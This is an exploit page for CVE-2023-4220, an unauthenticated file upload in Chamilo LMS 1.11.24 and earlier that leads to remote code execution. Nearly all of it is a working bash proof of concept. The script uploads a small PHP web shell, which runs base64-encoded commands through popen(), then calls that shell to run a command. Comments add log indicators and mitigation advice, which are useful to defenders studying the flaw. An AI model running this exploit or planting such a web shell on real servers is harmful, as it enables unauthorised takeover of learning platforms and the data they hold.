## https://sploitus.com/exploit?id=DFE9BBDB-BA64-57BE-ABCA-8364EBDD9116
#################################
CVE-2023-4220 RCE Chamilo 1.11.24
#################################
| https://starlabs.sg/advisories/23/23-4220/
|
| Chamilo LMS <= 1.11.24 (Beersel 31/08/2023)
| Unauthenticated file upload leading to Remote Code Execution in the "Big Upload" lib
|
| Identify the installed version: /documentation/changelog.html
|
| POC EXPLOIT CVE RCE VULN
|
.. code-block:: bash
#!/bin/bash
# Proof of concept for CVE-2023-4220: uploads a PHP file through the Big Upload
# endpoint without sending any credentials, then requests the uploaded file so
# that the server executes it and returns the command output.
#
# Defender notes, derived from what this script does:
#   - Log indicators: a POST to bigUpload.php with action=post-unsupported and a
#     multipart field named bigUploadFile, followed by requests to a .php file
#     under main/inc/lib/javascript/bigupload/files/.
#   - This script never removes the uploaded file, so it stays in that
#     directory until someone deletes it; inspect the directory during triage.
#   - Mitigation: move off the affected releases (<= 1.11.24 per this page; see
#     the linked advisory) and make sure the web server does not execute
#     scripts from the bigupload/files/ directory.

# Base URL of the Chamilo instance (example value).
HOST='http://lms.domain.com'
# Command to run on the server; `id` only prints the identity of the account
# that executes it.
CMD='id'
# Upload handler of the bundled Big Upload library. The request below carries
# no cookie, token or other credential.
URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
# Where the script expects the uploaded file to be reachable: the library's
# files/ directory, under the same name it was uploaded with.
URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
# Write the payload to a local temp file. The quoted 'EOF' delimiter stops the
# shell from expanding $a, $b and $_REQUEST inside the here-document.
# The PHP base64-decodes the request parameter "aoOoy", runs it with popen()
# and echoes the output in chunks of up to 2048 bytes, flushing after each.
cat <<'EOF'>/tmp/rce.php
<?php
$a=popen(base64_decode($_REQUEST["aoOoy"]),'r');while($b=fgets($a,2048)){echo $b;ob_flush();flush();}pclose($a);
?>
EOF
# Multipart form upload; the file is sent in the form field "bigUploadFile".
curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD"
# Encode the command: base64 without line wrapping (-w0), then URL-encode with
# quote_plus so that '+', '/' and '=' survive in the query string.
CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")
# Request the uploaded file with the encoded command; the response body is the
# command output.
curl "$HOST/$URL_FILE?aoOoy=$CMD"
|